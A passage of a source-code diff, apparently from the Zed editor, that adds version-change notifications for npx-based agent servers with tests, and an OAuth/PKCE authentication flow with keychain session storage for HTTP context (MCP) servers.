-1380,20 +1508,34 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent { struct LocalRegistryNpxAgent { node_runtime: NodeRuntime, project_environment: Entity, + version: SharedString, package: SharedString, args: Vec, distribution_env: HashMap, settings_env: HashMap, + new_version_available_tx: Option>>, } impl ExternalAgentServer for LocalRegistryNpxAgent { + fn version(&self) -> Option<&SharedString> { + Some(&self.version) + } + + fn take_new_version_available_tx(&mut self) -> Option>> { + self.new_version_available_tx.take() + } + + fn set_new_version_available_tx(&mut self, tx: watch::Sender>) { + self.new_version_available_tx = Some(tx); + } + fn get_command( &mut self, extra_env: HashMap, - _status_tx: Option>, - _new_version_available_tx: Option>>, + new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task> { + self.new_version_available_tx = new_version_available_tx; let node_runtime = self.node_runtime.clone(); let project_environment = self.project_environment.downgrade(); let package = self.package.clone(); @@ -1404,22 +1546,13 @@ impl ExternalAgentServer for LocalRegistryNpxAgent { cx.spawn(async move |cx| { let mut env = project_environment .update(cx, |project_environment, cx| { - project_environment.local_directory_environment( - &Shell::System, - paths::home_dir().as_path().into(), - cx, - ) + project_environment.default_environment(cx) })? .await .unwrap_or_default(); - let mut exec_args = Vec::new(); - exec_args.push("--yes".to_string()); - exec_args.push(package.to_string()); - if !args.is_empty() { - exec_args.push("--".to_string()); - exec_args.extend(args); - } + let mut exec_args = vec!["--yes".to_string(), "--".to_string(), package.to_string()]; + exec_args.extend(args); let npm_command = node_runtime .npm_command( @@ -1443,6 +1576,10 @@ impl ExternalAgentServer for LocalRegistryNpxAgent { }) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } @@ -1457,7 +1594,6 @@ impl ExternalAgentServer for LocalCustomAgent { fn get_command( &mut self, extra_env: HashMap, - _status_tx: Option>, _new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task> { @@ -1466,11 +1602,7 @@ impl ExternalAgentServer for LocalCustomAgent { cx.spawn(async move |cx| { let mut env = project_environment .update(cx, |project_environment, cx| { - project_environment.local_directory_environment( - &Shell::System, - paths::home_dir().as_path().into(), - cx, - ) + project_environment.default_environment(cx) })? .await .unwrap_or_default(); @@ -1481,15 +1613,15 @@ impl ExternalAgentServer for LocalCustomAgent { }) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } } -pub const GEMINI_NAME: &str = "gemini"; -pub const CLAUDE_AGENT_NAME: &str = "claude-acp"; -pub const CODEX_NAME: &str = "codex-acp"; - #[derive(Default, Clone, JsonSchema, Debug, PartialEq, RegisterSetting)] pub struct AllAgentServersSettings(pub HashMap); @@ -1763,3 +1895,339 @@ impl settings::Settings for AllAgentServersSettings { ) } } + +#[cfg(test)] +mod tests { + use super::*; + use crate::agent_registry_store::{ + AgentRegistryStore, RegistryAgent, RegistryAgentMetadata, RegistryNpxAgent, + }; + use crate::worktree_store::{WorktreeIdCounter, WorktreeStore}; + use gpui::{AppContext as _, TestAppContext}; + use node_runtime::NodeRuntime; + use settings::Settings as _; + + fn make_npx_agent(id: &str, version: &str) -> RegistryAgent { + let id = SharedString::from(id.to_string()); + RegistryAgent::Npx(RegistryNpxAgent { + metadata: RegistryAgentMetadata { + id: AgentId::new(id.clone()), + name: id.clone(), + description: SharedString::from(""), + version: SharedString::from(version.to_string()), + repository: None, + website: None, + icon_path: None, + }, + package: id, + args: Vec::new(), + env: HashMap::default(), + }) + } + + fn init_test_settings(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + }); + } + + fn init_registry( + cx: &mut TestAppContext, + agents: Vec, + ) -> gpui::Entity { + cx.update(|cx| AgentRegistryStore::init_test_global(cx, agents)) + } + + fn set_registry_settings(cx: &mut TestAppContext, agent_names: &[&str]) { + cx.update(|cx| { + AllAgentServersSettings::override_global( + AllAgentServersSettings( + agent_names + .iter() + .map(|name| { + ( + name.to_string(), + settings::CustomAgentServerSettings::Registry { + env: HashMap::default(), + default_mode: None, + default_model: None, + favorite_models: Vec::new(), + default_config_options: HashMap::default(), + favorite_config_option_values: HashMap::default(), + } + .into(), + ) + }) + .collect(), + ), + cx, + ); + }); + } + + fn create_agent_server_store(cx: &mut TestAppContext) -> gpui::Entity { + cx.update(|cx| { + let fs: Arc = fs::FakeFs::new(cx.background_executor().clone()); + let worktree_store = + cx.new(|cx| WorktreeStore::local(false, fs.clone(), WorktreeIdCounter::get(cx))); + let project_environment = cx.new(|cx| { + crate::ProjectEnvironment::new(None, worktree_store.downgrade(), None, false, cx) + }); + let http_client = http_client::FakeHttpClient::with_404_response(); + + cx.new(|cx| { + AgentServerStore::local( + NodeRuntime::unavailable(), + fs, + project_environment, + http_client, + cx, + ) + }) + }) + } + + #[test] + fn detects_supported_archive_suffixes() { + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.zip"), + Ok(AssetKind::Zip) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.zip?download=1"), + Ok(AssetKind::Zip) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tar.gz"), + Ok(AssetKind::TarGz) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tar.gz?download=1#latest"), + Ok(AssetKind::TarGz) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tgz"), + Ok(AssetKind::TarGz) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tgz#download"), + Ok(AssetKind::TarGz) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tar.bz2"), + Ok(AssetKind::TarBz2) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tar.bz2?download=1"), + Ok(AssetKind::TarBz2) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tbz2"), + Ok(AssetKind::TarBz2) + )); + assert!(matches!( + asset_kind_for_archive_url("https://example.com/agent.tbz2#download"), + Ok(AssetKind::TarBz2) + )); + } + + #[test] + fn parses_github_release_archive_urls() { + let github_archive = github_release_archive_from_url( + "https://github.com/owner/repo/releases/download/release%2F2.3.5/agent.tar.bz2?download=1", + ) + .unwrap(); + + assert_eq!(github_archive.repo_name_with_owner, "owner/repo"); + assert_eq!(github_archive.tag, "release/2.3.5"); + assert_eq!(github_archive.asset_name, "agent.tar.bz2"); + } + + #[test] + fn rejects_unsupported_archive_suffixes() { + let error = asset_kind_for_archive_url("https://example.com/agent.tar.xz") + .err() + .map(|error| error.to_string()); + + assert_eq!( + error, + Some("unsupported archive type in URL: https://example.com/agent.tar.xz".to_string()), + ); + } + + #[test] + fn versioned_archive_cache_dir_includes_version_before_url_hash() { + let slash_version_dir = versioned_archive_cache_dir( + Path::new("/tmp/agents"), + Some("release/2.3.5"), + "https://example.com/agent.zip", + ); + let colon_version_dir = versioned_archive_cache_dir( + Path::new("/tmp/agents"), + Some("release:2.3.5"), + "https://example.com/agent.zip", + ); + let file_name = slash_version_dir + .file_name() + .and_then(|name| name.to_str()) + .expect("cache directory should have a file name"); + + assert!(file_name.starts_with("v_release-2.3.5_")); + assert_ne!(slash_version_dir, colon_version_dir); + } + + #[gpui::test] + fn test_version_change_sends_notification(cx: &mut TestAppContext) { + init_test_settings(cx); + let registry = init_registry(cx, vec![make_npx_agent("test-agent", "1.0.0")]); + set_registry_settings(cx, &["test-agent"]); + let store = create_agent_server_store(cx); + + // Verify the agent was registered with version 1.0.0. + store.read_with(cx, |store, _| { + let entry = store + .external_agents + .get(&AgentId::new("test-agent")) + .expect("agent should be registered"); + assert_eq!( + entry.server.version().map(|v| v.to_string()), + Some("1.0.0".to_string()) + ); + }); + + // Set up a watch channel and store the tx on the agent. + let (tx, mut rx) = watch::channel::>(None); + store.update(cx, |store, _| { + let entry = store + .external_agents + .get_mut(&AgentId::new("test-agent")) + .expect("agent should be registered"); + entry.server.set_new_version_available_tx(tx); + }); + + // Update the registry to version 2.0.0. + registry.update(cx, |store, cx| { + store.set_agents(vec![make_npx_agent("test-agent", "2.0.0")], cx); + }); + cx.run_until_parked(); + + // The watch channel should have received the new version. + assert_eq!(rx.borrow().as_deref(), Some("2.0.0")); + } + + #[gpui::test] + fn test_same_version_preserves_tx(cx: &mut TestAppContext) { + init_test_settings(cx); + let registry = init_registry(cx, vec![make_npx_agent("test-agent", "1.0.0")]); + set_registry_settings(cx, &["test-agent"]); + let store = create_agent_server_store(cx); + + let (tx, mut rx) = watch::channel::>(None); + store.update(cx, |store, _| { + let entry = store + .external_agents + .get_mut(&AgentId::new("test-agent")) + .expect("agent should be registered"); + entry.server.set_new_version_available_tx(tx); + }); + + // "Refresh" the registry with the same version. + registry.update(cx, |store, cx| { + store.set_agents(vec![make_npx_agent("test-agent", "1.0.0")], cx); + }); + cx.run_until_parked(); + + // No notification should have been sent. + assert_eq!(rx.borrow().as_deref(), None); + + // The tx should have been transferred to the rebuilt agent entry. + store.update(cx, |store, _| { + let entry = store + .external_agents + .get_mut(&AgentId::new("test-agent")) + .expect("agent should be registered"); + assert!( + entry.server.take_new_version_available_tx().is_some(), + "tx should have been transferred to the rebuilt agent" + ); + }); + } + + #[gpui::test] + fn test_no_tx_stored_does_not_panic_on_version_change(cx: &mut TestAppContext) { + init_test_settings(cx); + let registry = init_registry(cx, vec![make_npx_agent("test-agent", "1.0.0")]); + set_registry_settings(cx, &["test-agent"]); + let _store = create_agent_server_store(cx); + + // Update the registry without having stored any tx — should not panic. + registry.update(cx, |store, cx| { + store.set_agents(vec![make_npx_agent("test-agent", "2.0.0")], cx); + }); + cx.run_until_parked(); + } + + #[gpui::test] + fn test_multiple_agents_independent_notifications(cx: &mut TestAppContext) { + init_test_settings(cx); + let registry = init_registry( + cx, + vec![ + make_npx_agent("agent-a", "1.0.0"), + make_npx_agent("agent-b", "3.0.0"), + ], + ); + set_registry_settings(cx, &["agent-a", "agent-b"]); + let store = create_agent_server_store(cx); + + let (tx_a, mut rx_a) = watch::channel::>(None); + let (tx_b, mut rx_b) = watch::channel::>(None); + store.update(cx, |store, _| { + store + .external_agents + .get_mut(&AgentId::new("agent-a")) + .expect("agent-a should be registered") + .server + .set_new_version_available_tx(tx_a); + store + .external_agents + .get_mut(&AgentId::new("agent-b")) + .expect("agent-b should be registered") + .server + .set_new_version_available_tx(tx_b); + }); + + // Update only agent-a to a new version; agent-b stays the same. + registry.update(cx, |store, cx| { + store.set_agents( + vec![ + make_npx_agent("agent-a", "2.0.0"), + make_npx_agent("agent-b", "3.0.0"), + ], + cx, + ); + }); + cx.run_until_parked(); + + // agent-a should have received a notification. + assert_eq!(rx_a.borrow().as_deref(), Some("2.0.0")); + + // agent-b should NOT have received a notification. + assert_eq!(rx_b.borrow().as_deref(), None); + + // agent-b's tx should have been transferred. + store.update(cx, |store, _| { + assert!( + store + .external_agents + .get_mut(&AgentId::new("agent-b")) + .expect("agent-b should be registered") + .server + .take_new_version_available_tx() + .is_some(), + "agent-b tx should have been transferred" + ); + }); + } +} diff --git a/crates/project/src/buffer_store.rs b/crates/project/src/buffer_store.rs index 9faf80b7ac00002c005df3a3b1e0674dcdd4cc81..d2f05a119a1883a1ec744b40d4cdb467074d3c83 100644 --- a/crates/project/src/buffer_store.rs +++ b/crates/project/src/buffer_store.rs @@ -527,7 +527,10 @@ impl LocalBufferStore { let new_file = if let Some(entry) = snapshot_entry { File { disk_state: match entry.mtime { - Some(mtime) => DiskState::Present { mtime }, + Some(mtime) => DiskState::Present { + mtime, + size: entry.size, + }, None => old_file.disk_state, }, is_local: true, @@ -869,7 +872,6 @@ impl BufferStore { entry .insert( - // todo(lw): hot foreground spawn cx.spawn(async move |this, cx| { let load_result = load_buffer.await; this.update(cx, |this, _cx| { diff --git a/crates/project/src/context_server_store.rs b/crates/project/src/context_server_store.rs index 88dc64fcbe8795ae4826dcaa2813744f525b9258..7b9fc16f10022805ea62df2f8b3df279fc96ae3d 100644 --- a/crates/project/src/context_server_store.rs +++ b/crates/project/src/context_server_store.rs @@ -7,10 +7,16 @@ use std::time::Duration; use anyhow::{Context as _, Result}; use collections::{HashMap, HashSet}; +use context_server::oauth::{self, McpOAuthTokenProvider, OAuthDiscovery, OAuthSession}; +use context_server::transport::{HttpTransport, TransportError}; use context_server::{ContextServer, ContextServerCommand, ContextServerId}; -use futures::{FutureExt as _, future::Either, future::join_all}; +use credentials_provider::CredentialsProvider; +use futures::future::Either; +use futures::{FutureExt as _, StreamExt as _, future::join_all}; use gpui::{App, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, WeakEntity, actions}; +use http_client::HttpClient; use itertools::Itertools; +use rand::Rng as _; use registry::ContextServerDescriptorRegistry; use remote::RemoteClient; use rpc::{AnyProtoClient, TypedEnvelope, proto}; @@ -45,6 +51,12 @@ pub enum ContextServerStatus { Running, Stopped, Error(Arc), + /// The server returned 401 and OAuth authorization is needed. The UI + /// should show an "Authenticate" button. + AuthRequired, + /// The OAuth browser flow is in progress — the user has been redirected + /// to the authorization server and we're waiting for the callback. + Authenticating, } impl ContextServerStatus { @@ -54,6 +66,8 @@ impl ContextServerStatus { ContextServerState::Running { .. } => ContextServerStatus::Running, ContextServerState::Stopped { .. } => ContextServerStatus::Stopped, ContextServerState::Error { error, .. } => ContextServerStatus::Error(error.clone()), + ContextServerState::AuthRequired { .. } => ContextServerStatus::AuthRequired, + ContextServerState::Authenticating { .. } => ContextServerStatus::Authenticating, } } } @@ -77,24 +91,42 @@ enum ContextServerState { configuration: Arc, error: Arc, }, + /// The server requires OAuth authorization before it can be used. The + /// `OAuthDiscovery` holds everything needed to start the browser flow. + AuthRequired { + server: Arc, + configuration: Arc, + discovery: Arc, + }, + /// The OAuth browser flow is in progress. The user has been redirected + /// to the authorization server and we're waiting for the callback. + Authenticating { + server: Arc, + configuration: Arc, + _task: Task<()>, + }, } impl ContextServerState { pub fn server(&self) -> Arc { match self { - ContextServerState::Starting { server, .. } => server.clone(), - ContextServerState::Running { server, .. } => server.clone(), - ContextServerState::Stopped { server, .. } => server.clone(), - ContextServerState::Error { server, .. } => server.clone(), + ContextServerState::Starting { server, .. } + | ContextServerState::Running { server, .. } + | ContextServerState::Stopped { server, .. } + | ContextServerState::Error { server, .. } + | ContextServerState::AuthRequired { server, .. } + | ContextServerState::Authenticating { server, .. } => server.clone(), } } pub fn configuration(&self) -> Arc { match self { - ContextServerState::Starting { configuration, .. } => configuration.clone(), - ContextServerState::Running { configuration, .. } => configuration.clone(), - ContextServerState::Stopped { configuration, .. } => configuration.clone(), - ContextServerState::Error { configuration, .. } => configuration.clone(), + ContextServerState::Starting { configuration, .. } + | ContextServerState::Running { configuration, .. } + | ContextServerState::Stopped { configuration, .. } + | ContextServerState::Error { configuration, .. } + | ContextServerState::AuthRequired { configuration, .. } + | ContextServerState::Authenticating { configuration, .. } => configuration.clone(), } } } @@ -126,6 +158,15 @@ impl ContextServerConfiguration { } } + pub fn has_static_auth_header(&self) -> bool { + match self { + ContextServerConfiguration::Http { headers, .. } => headers + .keys() + .any(|k| k.eq_ignore_ascii_case("authorization")), + _ => false, + } + } + pub fn remote(&self) -> bool { match self { ContextServerConfiguration::Custom { remote, .. } => *remote, @@ -222,6 +263,7 @@ pub struct ContextServerStore { update_servers_task: Option>>, context_server_factory: Option, needs_server_update: bool, + ai_disabled: bool, _subscriptions: Vec, } @@ -377,23 +419,42 @@ impl ContextServerStore { cx: &mut Context, ) -> Self { let mut subscriptions = vec![cx.observe_global::(move |this, cx| { + let ai_disabled = DisableAiSettings::get_global(cx).disable_ai; + let ai_was_disabled = this.ai_disabled; + this.ai_disabled = ai_disabled; + let settings = &Self::resolve_project_settings(&this.worktree_store, cx).context_servers; - if &this.context_server_settings == settings { + let settings_changed = &this.context_server_settings != settings; + + if settings_changed { + this.context_server_settings = settings.clone(); + } + + // When AI is disabled, stop all running servers + if ai_disabled { + let server_ids: Vec<_> = this.servers.keys().cloned().collect(); + for id in server_ids { + this.stop_server(&id, cx).log_err(); + } return; } - this.context_server_settings = settings.clone(); - if maintain_server_loop { + + // Trigger updates if AI was re-enabled or settings changed + if maintain_server_loop && (ai_was_disabled || settings_changed) { this.available_context_servers_changed(cx); } })]; if maintain_server_loop { subscriptions.push(cx.observe(®istry, |this, _registry, cx| { - this.available_context_servers_changed(cx); + if !DisableAiSettings::get_global(cx).disable_ai { + this.available_context_servers_changed(cx); + } })); } + let ai_disabled = DisableAiSettings::get_global(cx).disable_ai; let mut this = Self { state, _subscriptions: subscriptions, @@ -404,12 +465,13 @@ impl ContextServerStore { project: weak_project, registry, needs_server_update: false, + ai_disabled, servers: HashMap::default(), server_ids: Default::default(), update_servers_task: None, context_server_factory, }; - if maintain_server_loop { + if maintain_server_loop && !DisableAiSettings::get_global(cx).disable_ai { this.available_context_servers_changed(cx); } this @@ -496,9 +558,10 @@ impl ContextServerStore { pub fn start_server(&mut self, server: Arc, cx: &mut Context) { cx.spawn(async move |this, cx| { let this = this.upgrade().context("Context server store dropped")?; + let id = server.id(); let settings = this .update(cx, |this, _| { - this.context_server_settings.get(&server.id().0).cloned() + this.context_server_settings.get(&id.0).cloned() }) .context("Failed to get context server settings")?; @@ -511,7 +574,7 @@ impl ContextServerStore { }); let configuration = ContextServerConfiguration::from_settings( settings, - server.id(), + id.clone(), registry, worktree_store, cx, @@ -569,7 +632,11 @@ impl ContextServerStore { let id = server.id(); if matches!( self.servers.get(&id), - Some(ContextServerState::Starting { .. } | ContextServerState::Running { .. }) + Some( + ContextServerState::Starting { .. } + | ContextServerState::Running { .. } + | ContextServerState::Authenticating { .. }, + ) ) { self.stop_server(&id, cx).log_err(); } @@ -579,38 +646,20 @@ impl ContextServerStore { let configuration = configuration.clone(); async move |this, cx| { - match server.clone().start(cx).await { + let new_state = match server.clone().start(cx).await { Ok(_) => { debug_assert!(server.client().is_some()); - - this.update(cx, |this, cx| { - this.update_server_state( - id.clone(), - ContextServerState::Running { - server, - configuration, - }, - cx, - ) - }) - .log_err() - } - Err(err) => { - log::error!("{} context server failed to start: {}", id, err); - this.update(cx, |this, cx| { - this.update_server_state( - id.clone(), - ContextServerState::Error { - configuration, - server, - error: err.to_string().into(), - }, - cx, - ) - }) - .log_err() + ContextServerState::Running { + server, + configuration, + } } + Err(err) => resolve_start_failure(&id, err, server, configuration, cx).await, }; + this.update(cx, |this, cx| { + this.update_server_state(id.clone(), new_state, cx) + }) + .log_err(); } }); @@ -630,6 +679,20 @@ impl ContextServerStore { .servers .remove(id) .context("Context server not found")?; + + if let ContextServerConfiguration::Http { url, .. } = state.configuration().as_ref() { + let server_url = url.clone(); + let id = id.clone(); + cx.spawn(async move |_this, cx| { + let credentials_provider = cx.update(|cx| zed_credentials_provider::global(cx)); + if let Err(err) = Self::clear_session(&credentials_provider, &server_url, &cx).await + { + log::warn!("{} failed to clear OAuth session on removal: {}", id, err); + } + }) + .detach(); + } + drop(state); cx.emit(ServerStatusChangedEvent { server_id: id.clone(), @@ -721,29 +784,70 @@ impl ContextServerStore { configuration }; + if let Some(server) = this.update(cx, |this, _| { + this.context_server_factory + .as_ref() + .map(|factory| factory(id.clone(), configuration.clone())) + })? { + return Ok((server, configuration)); + } + + let cached_token_provider: Option> = + if let ContextServerConfiguration::Http { url, .. } = configuration.as_ref() { + if configuration.has_static_auth_header() { + None + } else { + let credentials_provider = cx.update(|cx| zed_credentials_provider::global(cx)); + let http_client = cx.update(|cx| cx.http_client()); + + match Self::load_session(&credentials_provider, url, &cx).await { + Ok(Some(session)) => { + log::info!("{} loaded cached OAuth session from keychain", id); + Some(Self::create_oauth_token_provider( + &id, + url, + session, + http_client, + credentials_provider, + cx, + )) + } + Ok(None) => None, + Err(err) => { + log::warn!("{} failed to load cached OAuth session: {}", id, err); + None + } + } + } + } else { + None + }; + let server: Arc = this.update(cx, |this, cx| { let global_timeout = Self::resolve_project_settings(&this.worktree_store, cx).context_server_timeout; - if let Some(factory) = this.context_server_factory.as_ref() { - return anyhow::Ok(factory(id.clone(), configuration.clone())); - } - match configuration.as_ref() { ContextServerConfiguration::Http { url, headers, timeout, - } => anyhow::Ok(Arc::new(ContextServer::http( - id, - url, - headers.clone(), - cx.http_client(), - cx.background_executor().clone(), - Some(Duration::from_secs( - timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS), - )), - )?)), + } => { + let transport = HttpTransport::new_with_token_provider( + cx.http_client(), + url.to_string(), + headers.clone(), + cx.background_executor().clone(), + cached_token_provider.clone(), + ); + anyhow::Ok(Arc::new(ContextServer::new_with_timeout( + id, + Arc::new(transport), + Some(Duration::from_secs( + timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS), + )), + ))) + } _ => { let mut command = configuration .command() @@ -840,6 +944,310 @@ impl ContextServerStore { ProjectSettings::get(location, cx) } + fn create_oauth_token_provider( + id: &ContextServerId, + server_url: &url::Url, + session: OAuthSession, + http_client: Arc, + credentials_provider: Arc, + cx: &mut AsyncApp, + ) -> Arc { + let (token_refresh_tx, mut token_refresh_rx) = futures::channel::mpsc::unbounded(); + let id = id.clone(); + let server_url = server_url.clone(); + + cx.spawn(async move |cx| { + while let Some(refreshed_session) = token_refresh_rx.next().await { + if let Err(err) = + Self::store_session(&credentials_provider, &server_url, &refreshed_session, &cx) + .await + { + log::warn!("{} failed to persist refreshed OAuth session: {}", id, err); + } + } + log::debug!("{} OAuth session persistence task ended", id); + }) + .detach(); + + Arc::new(McpOAuthTokenProvider::new( + session, + http_client, + Some(token_refresh_tx), + )) + } + + /// Initiate the OAuth browser flow for a server in the `AuthRequired` state. + /// + /// This starts a loopback HTTP callback server on an ephemeral port, builds + /// the authorization URL, opens the user's browser, waits for the callback, + /// exchanges the code for tokens, persists them in the keychain, and restarts + /// the server with the new token provider. + pub fn authenticate_server( + &mut self, + id: &ContextServerId, + cx: &mut Context, + ) -> Result<()> { + let state = self.servers.get(id).context("Context server not found")?; + + let (discovery, server, configuration) = match state { + ContextServerState::AuthRequired { + discovery, + server, + configuration, + } => (discovery.clone(), server.clone(), configuration.clone()), + _ => anyhow::bail!("Server is not in AuthRequired state"), + }; + + let id = id.clone(); + + let task = cx.spawn({ + let id = id.clone(); + let server = server.clone(); + let configuration = configuration.clone(); + async move |this, cx| { + let result = Self::run_oauth_flow( + this.clone(), + id.clone(), + discovery.clone(), + configuration.clone(), + cx, + ) + .await; + + if let Err(err) = &result { + log::error!("{} OAuth authentication failed: {:?}", id, err); + // Transition back to AuthRequired so the user can retry + // rather than landing in a terminal Error state. + this.update(cx, |this, cx| { + this.update_server_state( + id.clone(), + ContextServerState::AuthRequired { + server, + configuration, + discovery, + }, + cx, + ) + }) + .log_err(); + } + } + }); + + self.update_server_state( + id, + ContextServerState::Authenticating { + server, + configuration, + _task: task, + }, + cx, + ); + + Ok(()) + } + + async fn run_oauth_flow( + this: WeakEntity, + id: ContextServerId, + discovery: Arc, + configuration: Arc, + cx: &mut AsyncApp, + ) -> Result<()> { + let resource = oauth::canonical_server_uri(&discovery.resource_metadata.resource); + let pkce = oauth::generate_pkce_challenge(); + + let mut state_bytes = [0u8; 32]; + rand::rng().fill(&mut state_bytes); + let state_param: String = state_bytes.iter().map(|b| format!("{:02x}", b)).collect(); + + // Start a loopback HTTP server on an ephemeral port. The redirect URI + // includes this port so the browser sends the callback directly to our + // process. + let (redirect_uri, callback_rx) = oauth::start_callback_server() + .await + .context("Failed to start OAuth callback server")?; + + let http_client = cx.update(|cx| cx.http_client()); + let credentials_provider = cx.update(|cx| zed_credentials_provider::global(cx)); + let server_url = match configuration.as_ref() { + ContextServerConfiguration::Http { url, .. } => url.clone(), + _ => anyhow::bail!("OAuth authentication only supported for HTTP servers"), + }; + + let client_registration = + oauth::resolve_client_registration(&http_client, &discovery, &redirect_uri) + .await + .context("Failed to resolve OAuth client registration")?; + + let auth_url = oauth::build_authorization_url( + &discovery.auth_server_metadata, + &client_registration.client_id, + &redirect_uri, + &discovery.scopes, + &resource, + &pkce, + &state_param, + ); + + cx.update(|cx| cx.open_url(auth_url.as_str())); + + let callback = callback_rx + .await + .map_err(|_| { + anyhow::anyhow!("OAuth callback server was shut down before receiving a response") + })? + .context("OAuth callback server received an invalid request")?; + + if callback.state != state_param { + anyhow::bail!("OAuth state parameter mismatch (possible CSRF)"); + } + + let tokens = oauth::exchange_code( + &http_client, + &discovery.auth_server_metadata, + &callback.code, + &client_registration.client_id, + &redirect_uri, + &pkce.verifier, + &resource, + ) + .await + .context("Failed to exchange authorization code for tokens")?; + + let session = OAuthSession { + token_endpoint: discovery.auth_server_metadata.token_endpoint.clone(), + resource: discovery.resource_metadata.resource.clone(), + client_registration, + tokens, + }; + + Self::store_session(&credentials_provider, &server_url, &session, cx) + .await + .context("Failed to persist OAuth session in keychain")?; + + let token_provider = Self::create_oauth_token_provider( + &id, + &server_url, + session, + http_client.clone(), + credentials_provider, + cx, + ); + + let new_server = this.update(cx, |this, cx| { + let global_timeout = + Self::resolve_project_settings(&this.worktree_store, cx).context_server_timeout; + + match configuration.as_ref() { + ContextServerConfiguration::Http { + url, + headers, + timeout, + } => { + let transport = HttpTransport::new_with_token_provider( + http_client.clone(), + url.to_string(), + headers.clone(), + cx.background_executor().clone(), + Some(token_provider.clone()), + ); + Ok(Arc::new(ContextServer::new_with_timeout( + id.clone(), + Arc::new(transport), + Some(Duration::from_secs( + timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS), + )), + ))) + } + _ => anyhow::bail!("OAuth authentication only supported for HTTP servers"), + } + })??; + + this.update(cx, |this, cx| { + this.run_server(new_server, configuration, cx); + })?; + + Ok(()) + } + + /// Store the full OAuth session in the system keychain, keyed by the + /// server's canonical URI. + async fn store_session( + credentials_provider: &Arc, + server_url: &url::Url, + session: &OAuthSession, + cx: &AsyncApp, + ) -> Result<()> { + let key = Self::keychain_key(server_url); + let json = serde_json::to_string(session)?; + credentials_provider + .write_credentials(&key, "mcp-oauth", json.as_bytes(), cx) + .await + } + + /// Load the full OAuth session from the system keychain for the given + /// server URL. + async fn load_session( + credentials_provider: &Arc, + server_url: &url::Url, + cx: &AsyncApp, + ) -> Result> { + let key = Self::keychain_key(server_url); + match credentials_provider.read_credentials(&key, cx).await? { + Some((_username, password_bytes)) => { + let session: OAuthSession = serde_json::from_slice(&password_bytes)?; + Ok(Some(session)) + } + None => Ok(None), + } + } + + /// Clear the stored OAuth session from the system keychain. + async fn clear_session( + credentials_provider: &Arc, + server_url: &url::Url, + cx: &AsyncApp, + ) -> Result<()> { + let key = Self::keychain_key(server_url); + credentials_provider.delete_credentials(&key, cx).await + } + + fn keychain_key(server_url: &url::Url) -> String { + format!("mcp-oauth:{}", oauth::canonical_server_uri(server_url)) + } + + /// Log out of an OAuth-authenticated MCP server: clear the stored OAuth + /// session from the keychain and stop the server. + pub fn logout_server(&mut self, id: &ContextServerId, cx: &mut Context) -> Result<()> { + let state = self.servers.get(id).context("Context server not found")?; + let configuration = state.configuration(); + + let server_url = match configuration.as_ref() { + ContextServerConfiguration::Http { url, .. } => url.clone(), + _ => anyhow::bail!("logout only applies to HTTP servers with OAuth"), + }; + + let id = id.clone(); + self.stop_server(&id, cx)?; + + cx.spawn(async move |this, cx| { + let credentials_provider = cx.update(|cx| zed_credentials_provider::global(cx)); + if let Err(err) = Self::clear_session(&credentials_provider, &server_url, &cx).await { + log::error!("{} failed to clear OAuth session: {}", id, err); + } + // Trigger server recreation so the next start uses a fresh + // transport without the old (now-invalidated) token provider. + this.update(cx, |this, cx| { + this.available_context_servers_changed(cx); + }) + .log_err(); + }) + .detach(); + + Ok(()) + } + fn update_server_state( &mut self, id: ContextServerId, @@ -993,3 +1401,104 @@ impl ContextServerStore { Ok(()) } } + +/// Determines the appropriate server state after a start attempt fails. +/// +/// When the error is an HTTP 401 with no static auth header configured, +/// attempts OAuth discovery so the UI can offer an authentication flow. +async fn resolve_start_failure( + id: &ContextServerId, + err: anyhow::Error, + server: Arc, + configuration: Arc, + cx: &AsyncApp, +) -> ContextServerState { + let www_authenticate = err.downcast_ref::().map(|e| match e { + TransportError::AuthRequired { www_authenticate } => www_authenticate.clone(), + }); + + if www_authenticate.is_some() && configuration.has_static_auth_header() { + log::warn!("{id} received 401 with a static Authorization header configured"); + return ContextServerState::Error { + configuration, + server, + error: "Server returned 401 Unauthorized. Check your configured Authorization header." + .into(), + }; + } + + let server_url = match configuration.as_ref() { + ContextServerConfiguration::Http { url, .. } if !configuration.has_static_auth_header() => { + url.clone() + } + _ => { + if www_authenticate.is_some() { + log::error!("{id} got OAuth 401 on a non-HTTP transport or with static auth"); + } else { + log::error!("{id} context server failed to start: {err}"); + } + return ContextServerState::Error { + configuration, + server, + error: err.to_string().into(), + }; + } + }; + + // When the error is NOT a 401 but there is a cached OAuth session in the + // keychain, the session is likely stale/expired and caused the failure + // (e.g. timeout because the server rejected the token silently). Clear it + // so the next start attempt can get a clean 401 and trigger the auth flow. + if www_authenticate.is_none() { + let credentials_provider = cx.update(|cx| zed_credentials_provider::global(cx)); + match ContextServerStore::load_session(&credentials_provider, &server_url, cx).await { + Ok(Some(_)) => { + log::info!("{id} start failed with a cached OAuth session present; clearing it"); + ContextServerStore::clear_session(&credentials_provider, &server_url, cx) + .await + .log_err(); + } + _ => { + log::error!("{id} context server failed to start: {err}"); + return ContextServerState::Error { + configuration, + server, + error: err.to_string().into(), + }; + } + } + } + + let default_www_authenticate = oauth::WwwAuthenticate { + resource_metadata: None, + scope: None, + error: None, + error_description: None, + }; + let www_authenticate = www_authenticate + .as_ref() + .unwrap_or(&default_www_authenticate); + let http_client = cx.update(|cx| cx.http_client()); + + match context_server::oauth::discover(&http_client, &server_url, www_authenticate).await { + Ok(discovery) => { + log::info!( + "{id} requires OAuth 